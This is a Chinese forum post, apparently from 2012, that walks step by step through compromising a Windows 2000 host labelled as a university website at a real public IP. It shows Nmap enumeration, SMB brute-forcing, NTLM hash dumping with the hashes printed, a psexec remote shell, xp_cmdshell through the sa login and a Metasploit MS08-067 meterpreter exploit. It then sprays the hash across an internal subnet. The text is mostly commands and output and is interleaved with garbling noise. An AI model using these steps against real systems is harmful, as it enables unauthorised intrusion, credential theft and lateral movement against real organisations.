广西师范网站http://202.103.242.241/
1 F( v% O/ W* v4 v; A9 S! Y0 C& ~& M, x+ e% ]# ?7 E# J7 j) n; ^
root@bt:~# nmap -sS -sV 202.103.242.241
8 D6 V: K0 R9 m l: a" N1 P% h; d0 L: k1 _# `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
, O: }( C* v, P; v% J
+ Y' L+ {7 L! v: CNmap scan report for bogon (202.103.242.241)+ m3 B& x! H7 e9 t$ t
# c" t$ ^# w7 H6 G8 m4 b9 {' cHost is up (0.00048s latency).
5 f; _2 x' c( E
; ^0 n" x# y/ q0 S% p! TNot shown: 993 closed ports: V; p4 f9 d5 r0 i
) G' y# n* ?7 ~6 V) OPORT STATE SERVICE VERSION
. I0 G& K8 X! r
$ L: a4 h2 f1 _5 a' M135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
# v6 K9 @# t3 J& s- _8 H5 W) `) s- ^$ S
139/tcp open netbios-ssn7 l0 t9 b0 x; ?2 d
1 K5 R# l C( w5 G
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
0 O0 V4 I5 W0 p% _. l: {. V# D5 p' }8 L& a9 b+ g, ^
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)" k! f( H6 V7 i6 `) J8 }
2 s& G& t3 ~* E
1026/tcp open msrpc Microsoft Windows RPC
4 \3 [' t+ N g& m9 N8 S% X1 P7 ]7 f! ], G& K
3372/tcp open msdtc?
. {& U8 U6 c" n! r
5 M1 v& {8 @' E3389/tcp open ms-term-serv?, ~% F! z$ @( o" V3 D
5 i+ y8 p* D6 X( ?3 N& d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :+ @3 v& P! C2 d" G: W
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
$ ^3 k4 C5 B9 H5 r* n9 ]( t3 o4 y
( q% D: g0 @9 s" c7 ~* YSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
# x, L. _/ [' s E$ L0 g! X: [% z
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
+ R; F% Z+ I0 P+ [ F4 O
; L& O7 T$ R0 e, S' I+ F( D: aSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO4 [8 w0 v ~% e# a/ m
) e' v+ A2 G( o5 m
SF:ptions,6,”hO\n\x000Z”);
4 i! \) o0 z2 s0 U2 m
# V: V& x0 `$ b0 Y$ ^- z6 @MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
c. x+ E) d4 K* a% l. K+ R5 {4 G4 o/ J9 J! x9 w
Service Info: OS: Windows
$ o* Q8 c9 O# R# o
0 ~- L" u8 F5 ^( f" LService detection performed. Please report any incorrect results at http://nmap.org/submit/ .' T% v' ]- W5 z9 L7 o$ i$ u
1 p+ m- T4 [3 H- X& D5 wNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
5 v2 q3 @4 X9 v" G
' g' s) O4 R' H! i) |& froot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本2 B! `7 l1 ?, Z! {1 b. K
( Q, m9 c9 K$ S8 T-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse5 r3 ~$ w; d: F+ ]* \3 V
, ?" a& j3 E. }* i5 ?
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse" |! v9 C) l5 R, L3 ]
+ |4 n7 `* H; t! y" ]4 A) [. ~8 Z-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
; W e, O) H2 k# z
: \4 u; U' } t6 Q4 I" X4 p-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
9 a- s5 Y; U/ r/ ] T
8 p Z5 C$ ?% U' l$ H-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
8 O; x+ Y0 g' l. y8 B3 K S& P5 _3 }9 q. ~
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse5 L, ? z# e; B7 E; S+ ~% u# K3 D0 u4 t
: ?- o' q9 M3 b- H; D/ Y- B-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse+ `$ y- o2 g! U& T9 a6 n2 i
4 \/ t% J1 Z) Z/ u+ v
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
( ], Q4 W% k7 [+ I- O9 D4 Z# x) v+ ^! T
; [% u7 ? q* D$ F-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
+ X6 Q T$ Y" ^0 |. L F' s: I' E+ n \6 }8 N! R
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse \5 R2 N! Z$ `' g# O
1 B" u. a3 [; E( v3 P2 g-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 ?+ s) A3 X5 T! T5 K' p
$ q0 V" |4 j* R" F* Q, O-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
4 [0 N9 s5 @ G; ?$ Q3 |2 M7 D5 B( V+ c
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse, d- U: M8 L+ `. @$ A
" B4 P- E( i9 ?) @% K h: X-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse4 u$ B# e3 g: c3 a. B" M9 h
6 `* J' ~$ P" n: H) e
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
+ ^! D' {2 d, n" O+ k7 H+ N9 q- O+ P$ | L# |+ f
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
2 P8 P* Q; Y1 X4 B2 x# i7 c
7 v, q& b4 |3 o4 q0 M//此乃使用脚本扫描远程机器所存在的账户名
0 {- C6 ^. o/ k A$ v2 c7 x8 V* g. N5 ]( Q1 \; Z: n" `9 h
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
( x3 y$ k( m$ c+ Y
( y1 J% X3 U1 B2 mNmap scan report for bogon (202.103.242.241)
4 X" d; o0 q; J& {2 z& ]
( Q& c+ e* G* W! r4 fHost is up (0.00038s latency).% y1 T. x, [) J: ?9 r. E, N
6 n- M7 S" M2 L6 c. _Not shown: 993 closed ports
: S5 }) E- h, o# k' E% Y5 |: O; t% F" S) x3 r l
PORT STATE SERVICE" d5 J1 s( v" S
& X; V7 H7 Q. B135/tcp open msrpc3 g9 W6 s$ t( x' q
9 [) ~* l( Z- p6 j$ S2 o& x) O" K) C5 O139/tcp open netbios-ssn
5 s" y; I0 G( n+ w ]# l' u4 Z$ C8 D1 c+ m4 P# `
445/tcp open microsoft-ds) h) }% X' H6 ?% O0 t- m# m
0 S& Z! F7 E+ B
1025/tcp open NFS-or-IIS
1 ^/ u" J! H t+ Z9 M: B
, o; O5 ~4 v1 g9 R U3 c5 Y+ K1026/tcp open LSA-or-nterm
+ W: `. D X9 _5 ~) M4 X& |" V3 M4 y- T5 q, p1 u
3372/tcp open msdtc4 L; ]6 `$ t/ k& l% Q. c
' B; b F( \9 @3389/tcp open ms-term-serv* y# e2 |0 P. ^ [
- x6 x/ F* P8 K4 p' r# nMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 K% C7 m. V& t1 D
9 R+ j! b( O% I8 C" g! ?* v0 S
Host script results:
6 o0 c# Y3 b! \# D5 w) D) T
3 S6 y: ~7 |$ f: [# ^/ e| smb-enum-users:% _$ p/ ?5 t$ ^3 c6 N j, m
( q$ ]+ [# m2 S3 D2 B
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
* K+ X* F; D2 z- r+ h6 Q- s3 K2 }- M6 e' N& R
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
! m& L6 e6 E0 s. W1 A) A- E
( S' v7 a2 }; K# ]root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 # g5 t l$ u, D1 d3 B
! H: D: }+ @! h. I$ m6 @
//查看共享
' [5 f B# L) i0 _& l2 A. y- d# d% A! w4 F& o
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST, L) ?( D- R5 ^/ |/ c
/ |3 i# @% g# N4 K
Nmap scan report for bogon (202.103.242.241)! S% v1 I: P2 t) X0 d+ V) K
- ~0 Q; _, K4 ]6 I' T4 z @Host is up (0.00035s latency).) _7 L4 W {+ s* n2 D4 y
# ~' R0 T) M( C1 n& t3 I ]( _
Not shown: 993 closed ports$ H' ^+ S4 P- N/ F6 T/ R
I! W2 e' K! x! R) vPORT STATE SERVICE- Y0 c% o0 ?. h: [% G
1 O! [% S. R7 ^$ n135/tcp open msrpc
, C r/ v1 S( t( }6 g* A; L1 @- i1 M5 Z0 |) L7 k2 h a: K
139/tcp open netbios-ssn ?2 P9 l( D7 p: K$ [
+ w! c8 D1 {7 J1 N6 m0 i e445/tcp open microsoft-ds
& m/ |# M% @8 x& |$ O! S7 N
5 d5 k8 X. }, o4 k1025/tcp open NFS-or-IIS' n; u( W& H5 t2 c/ e3 O
# Y1 S" d( ^% ~5 q
1026/tcp open LSA-or-nterm
: d5 W" x3 Y3 m, T, W& U# o) c' j0 E5 }! j6 |
3372/tcp open msdtc2 d6 s+ e/ E! N+ N* _. M1 K* L6 ~
& ]! }+ @+ h' P
3389/tcp open ms-term-serv
( Q9 g: Y3 O( C* r6 \! r7 W1 z* ?$ N
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). S2 Y8 z$ S/ a' |& {
; f* Q2 p$ b* M6 p. X/ U! O
Host script results:
. @3 [0 r+ ^, n5 U" G
# ]& y+ ?! w3 Z. K| smb-enum-shares:8 X9 ?) Z; @& g3 Z. \- L# U7 S
9 i7 y- B$ d2 y7 B! `7 q
| ADMIN$
) T8 B) c1 T0 e4 I, r5 N4 o% Q# C9 l. A8 f0 N4 W) w5 z/ H
| Anonymous access: <none>
/ y h7 J5 W' e/ ^( i6 W+ w) b4 l' v8 y% D+ c
| C$
4 I, ^2 R4 V: q; n$ {5 s" g$ Y
/ ?- Y) r. S% p5 D0 i9 f x| Anonymous access: <none>
% F3 ]' [! [2 K0 ?) ?$ P5 w c: m( N9 ~& H
| IPC$* @7 O( h7 K% B2 P2 B
3 ^% s+ N1 F- l/ j1 |; C
|_ Anonymous access: READ) U1 c8 T0 s4 R0 N( }
: X v; b3 a M" o2 j! P ~
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 T0 b/ ^+ }! o! Y! t1 n) ^
2 E* C+ {+ w9 r1 s9 z; Eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 9 A M8 n& r( P8 @8 q$ i* _+ s
$ n- H# S, p9 H" L/ j8 z5 a r//获取用户密码
6 S* w$ `! b, k4 Z2 |% M
+ v/ Q5 q9 E: Z, BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST6 y8 W+ C6 q% v6 ^
6 D1 G* S* D6 i6 N L
Nmap scan report for bogon (202.103.242.2418)
9 R# L& I' U! z; u
- j. M8 r$ r V- c: i& w6 W! OHost is up (0.00041s latency).. m0 @7 F- L) r' A U
$ I8 \0 q% ]5 x7 X
Not shown: 993 closed ports
, O/ j5 C* Q/ k9 y! I: r' s* v0 U# O7 ~0 v& ~ O) P4 E3 M
PORT STATE SERVICE' t, m) [$ U, F$ z9 p# ~) `# Y
% i4 X0 _1 S, e& P
135/tcp open msrpc9 g9 J" z1 G; M3 n% _
% u) P; w) a: O/ {139/tcp open netbios-ssn, ~( e0 | v, `: } X! w9 w' K
$ r. q* C" o4 S9 {3 m" j" p
445/tcp open microsoft-ds% M+ C5 ?- a) x: g2 i
2 ?' R. B* @, Y+ y9 u5 }; i
1025/tcp open NFS-or-IIS
' @1 R* N C" S: U+ J3 g3 I* e; h, X/ O9 n! t# V& ]& u. \
1026/tcp open LSA-or-nterm6 n; F4 E4 \; L. ~
4 B9 o+ p4 ]6 i2 A
3372/tcp open msdtc
: h' c9 H/ F. m8 @6 o' h. G5 e/ D( f7 ]- |3 I5 C2 \
3389/tcp open ms-term-serv
) V7 ?+ C6 U. t/ @7 v+ c
* e' L/ v. p- m. NMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( A: S9 Q0 y T) ]
' A* @5 {7 x a8 K6 d* B4 w- xHost script results:
. P+ y: ]- X* @, E1 [( z' _% e& P0 ?) B& F$ \1 i# t1 u
| smb-brute:' F, H) u1 f4 X. ?* G; H( H/ q- a
. O0 v2 v, `# P
administrator:<blank> => Login was successful
+ ?/ s( t4 _, s
Q! \* M6 P( m* }$ Q. I5 y|_ test:123456 => Login was successful
0 t1 k1 b6 ^0 ^" \ L
- V4 B* {4 u) b7 J6 C( _6 E; [Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds6 ^) C$ h. z( e; x8 f1 q. X/ H+ c
- [ [% D2 k9 k% ~0 Q1 S1 troot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash4 u5 z( m2 \. `
/ O# W$ g6 S0 o+ _; C2 w' F( F& hroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data' b* r) ^, q) C) A, v" \0 V
( R2 Q. J7 u' M5 R' Lroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
& b& s* P$ E2 q# c% @* \8 m+ x% i" s1 V
: [9 `2 s# e0 ~" b* ]( e/ F2 iroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139" j; }' ?( p4 T. I/ T8 \
. K) d# [" x& ^. O4 t, bStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST+ I- |; ~- s- X* z
) H+ B: `3 h* e4 a0 u. L
Nmap scan report for bogon (202.103.242.241)
; K/ K' x4 w* ?
7 z3 w. `$ G; L6 {9 `Host is up (0.0012s latency).
, W$ M; a- M1 D0 o$ d9 [
; p! E A' d2 gPORT STATE SERVICE
0 A$ r8 @# ?- H3 a) }" c( v+ O" S2 Q9 A% w B4 I" h. b
135/tcp open msrpc
, O G/ I) d) M/ z0 ]6 E r0 `( L; S- m/ ^! m/ t4 o* D- R
139/tcp open netbios-ssn# S( {* ]1 K. j* X- ]% v P7 G; H
1 R8 H5 g. O% b$ L6 S' l445/tcp open microsoft-ds# x1 K1 g/ U* G7 W
) |3 L4 X: j) V% vMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 F \" z J; Q, m; E6 I% h2 D
9 R# r5 r5 F1 wHost script results:
: ^- C! ^+ {' f$ m4 Q" c) b% b
$ ?; y* [$ A; x' l( || smb-pwdump:& D) Y; x$ }) ]3 d# Z2 p
& E {& \2 u' h. Y, k% U
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
; u1 F$ X3 x& M0 J; u: u
* g8 D% v1 P7 q2 d+ V4 y9 i7 z| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
! n: }! H& \, }! U- I. i; k5 ?/ Z8 ?0 g1 T# d2 s+ ~0 Z1 j
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
& P2 s# b7 N0 v7 ^7 S7 b
- \3 C- Z& A9 h3 c7 o! u|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
( h* \( s K0 M0 v' \+ C" y7 _
8 j5 h. |# `. h+ |2 T' t$ SNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
) |' @5 b7 F0 O; S: ]' U+ o: ]; t' E. B9 D
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
* u& S l( r C, a: }- C- g/ `# v- E' A/ w
-p 123456 -e cmd.exe0 E# z& k" `2 U$ ]' h$ l7 E
7 q: I- p! g, X8 Y0 r/ zPsExec v1.55 – Execute processes remotely' i* Z9 }. Y# z/ M; {9 v* [
' f7 f/ C' a$ s) f
Copyright (C) 2001-2004 Mark Russinovich
% b$ b1 A+ w6 M$ F1 `, w+ v8 c& A& W/ c" u+ l- @
Sysinternals – www.sysinternals.com
, O; E9 [3 ^* f7 v. l! q4 | A, j, f( ^* G" E
Microsoft Windows 2000 [Version 5.00.2195]
0 V* n6 A) _- g! {! a0 e
7 x$ \( }' ?' R0 p(C) 版权所有 1985-2000 Microsoft Corp.
8 Q3 c" R9 X1 \0 b4 A7 Y+ n$ L$ ]4 p: e* F8 |! {; ^" A6 R
C:\WINNT\system32>ipconfig5 F0 h& M, L' b" ^7 M! }
s' a8 N7 |7 B9 c; m3 LWindows 2000 IP Configuration
Z( j5 H# F7 J; Q- L8 o
( x8 ^3 M* `3 N) m2 L! ^1 FEthernet adapter 本地连接:, O( R$ n5 [$ o6 ?( v* b
1 g0 V* r* D/ L. `# h# u7 N' Z; g; w7 k
Connection-specific DNS Suffix . :$ {1 a3 R: A8 N/ _) Q. j- r( z
- P" ^4 \* {( A! k. ]IP Address. . . . . . . . . . . . : 202.103.242.241$ E# ]# u' b i7 }1 ~ e% n
5 z. ^6 i5 v. Q G# v
Subnet Mask . . . . . . . . . . . : 255.255.255.04 ^' r8 c* m" m. E
. m* c0 n* z2 R4 P
Default Gateway . . . . . . . . . : 202.103.1.1
! ^+ V5 F$ w* W4 @! B9 K, X) F' ?7 E( u! s. J: L
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
2 d# ?. G4 I) H( s8 P5 F; U
3 G' X0 A; ?- o1 H, oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞2 M/ p, U' v& a7 i
6 D) T' ?: g6 h7 J1 t0 K: BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
! b! `/ P. o( ?0 @, ]; Z; Z& K0 v' J/ ?$ L- f$ y a& i
Nmap scan report for bogon (202.103.242.241)
/ v; X6 ~( ^( m4 ^; i% `' j' T
) G; w8 o' ]# D8 W0 r4 {Host is up (0.00046s latency).) M$ o3 V# N! \) _
' n& s/ d* N/ d6 v4 V4 D& n; s4 DNot shown: 993 closed ports
6 R! k, x) K# U1 s% B' j c
1 @# v9 D, {# U# o3 m+ T) U# L# XPORT STATE SERVICE7 H' o' B* s2 e* c K8 s% y
, p8 D. N3 h% p135/tcp open msrpc
& ~4 R1 W6 @( I
' d: u1 @8 X8 o& l139/tcp open netbios-ssn4 j% C7 c# y, i, o; B
# m# g* E" c+ ]! W, f; M' a m; J
445/tcp open microsoft-ds' }" |$ P; q; d( q4 d0 p
+ f; A; {. M! B1 z- A8 C2 z6 u* W1025/tcp open NFS-or-IIS
8 C: P# n5 x- o/ F" T6 _; ]& Y, Q: c" U$ C7 M0 K1 ]
1026/tcp open LSA-or-nterm6 o; r0 A: H" `$ _0 a! p
0 Z& _" X+ p8 M. c; z3372/tcp open msdtc
& M/ n9 L/ p0 B+ s) s ^
3 U2 C; P) A* P; ^1 r( m/ E* L3389/tcp open ms-term-serv
# v0 I' T* f2 {
4 A. e- v) X4 D- E- w y6 J7 V6 K+ N! oMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 Q7 q- r u- G4 s
5 V5 y, C0 K7 h4 ^* oHost script results:
+ ^3 B+ q4 Y8 B4 b2 F/ k
, f* f' g0 x! m$ x| smb-check-vulns:+ d$ G2 w# Q+ p
( S! w5 C, y8 \" {' K$ w
|_ MS08-067: VULNERABLE
% Z( }' @0 g# Z/ S2 Q) q3 d& n' g& U# ?1 \4 C+ T L1 ~# L' ?: e% Y: M
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
0 o6 q. S1 N$ g& w0 R- W9 q1 F6 n2 t. m& x7 ~, x5 D& R9 u
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
# Z& T# w1 P! t5 t. G$ d
3 Z/ _7 M9 d# O2 t* U& ?( H8 ^msf > search ms08
; b5 [0 e8 C& O% @$ \
0 R5 r2 v" P; b5 {* Zmsf > use exploit/windows/smb/ms08_067_netapi
1 M. Z" a5 U" g/ k3 K! h
L8 z0 s, K4 {) omsf exploit(ms08_067_netapi) > show options. i Q8 q$ U8 W* P
# x) Y& B1 }: V* k" K7 d8 Tmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
2 O7 C% z3 H0 b$ j$ _8 z7 {, D
|% I! G& l6 {0 ]7 |msf exploit(ms08_067_netapi) > show payloads
* Q# a; b T- M; J3 |3 ]! N" X3 w" X$ k$ f- r3 s
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
7 m6 o$ @1 [! N
$ B9 k. U* W5 s# |$ Fmsf exploit(ms08_067_netapi) > exploit! z; g6 N! t- L$ n6 m; T Y
/ F! g6 n( w: k7 w7 J
meterpreter >+ v" |- c. u/ R0 x
8 w* m% x# x2 [2 |* V$ q8 P& t
Background session 2? [y/N] (ctrl+z)
6 I8 Q4 M: s$ T; e2 h: t G& w1 R9 U0 i; d) p9 B# W
msf exploit(ms08_067_netapi) > sessions -l2 T* x g+ b6 R# Z
' M; w2 @& Y; H5 y/ g( k
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt" h) a0 M( [7 |5 R: F1 R; v! S
+ E7 q1 d$ S* M! dtest
9 R# S2 u6 C% e4 d
$ L! A- C2 \. K" P5 v( {- Badministrator
8 `1 `6 L$ @% Q* v3 z' B9 C, S! v9 f5 ?$ `0 |1 u, ] @
root@bt:/usr/local/share/nmap/scripts# vim password.txt' _: A+ A0 \. b/ H
+ C) t8 ?3 A: R# Z: H
44EFCE164AB921CAAAD3B435B51404EE; t4 i3 Q1 {7 G/ G e! @ i
% t7 s9 x C1 }/ P+ b+ Y4 croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 # \2 T% S1 t+ K0 U, V% T+ x
% B7 Q* [5 V! X; g& U9 w
//利用用户名跟获取的hash尝试对整段内网进行登录, _3 u5 E- @( g' A1 u, L8 A
: C2 M ^% }8 ?6 e6 K3 {, xNmap scan report for 192.168.1.105
% T4 P% `, V& A. T; {
' y+ X$ `* ?1 ]3 Z7 D, z1 C% RHost is up (0.00088s latency).
8 A/ r5 \* u0 R2 ? L1 [4 f$ N0 n& ^+ F, c2 m6 l) B1 z
Not shown: 993 closed ports' Y' T$ {& K$ h& O2 h
1 C4 E, ]; h8 q. d$ e
PORT STATE SERVICE
* P+ Y/ P! h( q7 t! A
. J4 e0 }+ D* S' `135/tcp open msrpc' z$ i8 d. X H7 T0 h2 y
) h+ D$ ?- `6 i% I1 U* y- l6 W
139/tcp open netbios-ssn o; a/ ?7 z" G% }' \# v# \: {8 l
. s5 U+ m. s5 ^7 n$ {! Z. b. T
445/tcp open microsoft-ds X# S9 W& h' j; j7 D
% u- I5 t) v# R' v1025/tcp open NFS-or-IIS
+ g o5 N) F7 }' r7 |* u3 _ |2 P8 E( [; U
1026/tcp open LSA-or-nterm
) k, }$ _! s+ {/ d
& H& R3 P9 W# ~) l7 O: H3372/tcp open msdtc
5 Y" a; ^6 I% B8 f
9 `* F6 b. V9 _6 a+ P. N2 w3389/tcp open ms-term-serv' Q8 f6 |; w7 E. U2 B' b u/ ~7 U
, u# x; m/ F# h0 e! O7 A% aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* T2 g) e$ [, ]5 U' ]
/ u& Y$ [) A7 |Host script results:
+ c3 R8 v. w. i5 K; j5 r7 s# t" Y( @9 E) i, K; ~ u) f6 d
| smb-brute:: S) e+ K% F3 Y% y, Q: B2 `
b- e$ \, |5 ^" G3 a
|_ administrator:<blank> => Login was successful: r% o8 \1 K0 v$ c& l
" O5 G" P, O* d5 n, A
攻击成功,一个简单的msf+nmap攻击~~·
- V& ]4 c, Y2 o* t2 F2 p3 g; D* \8 w$ r
|
发表于 2012-12-4 12:46:42
收藏
支持
反对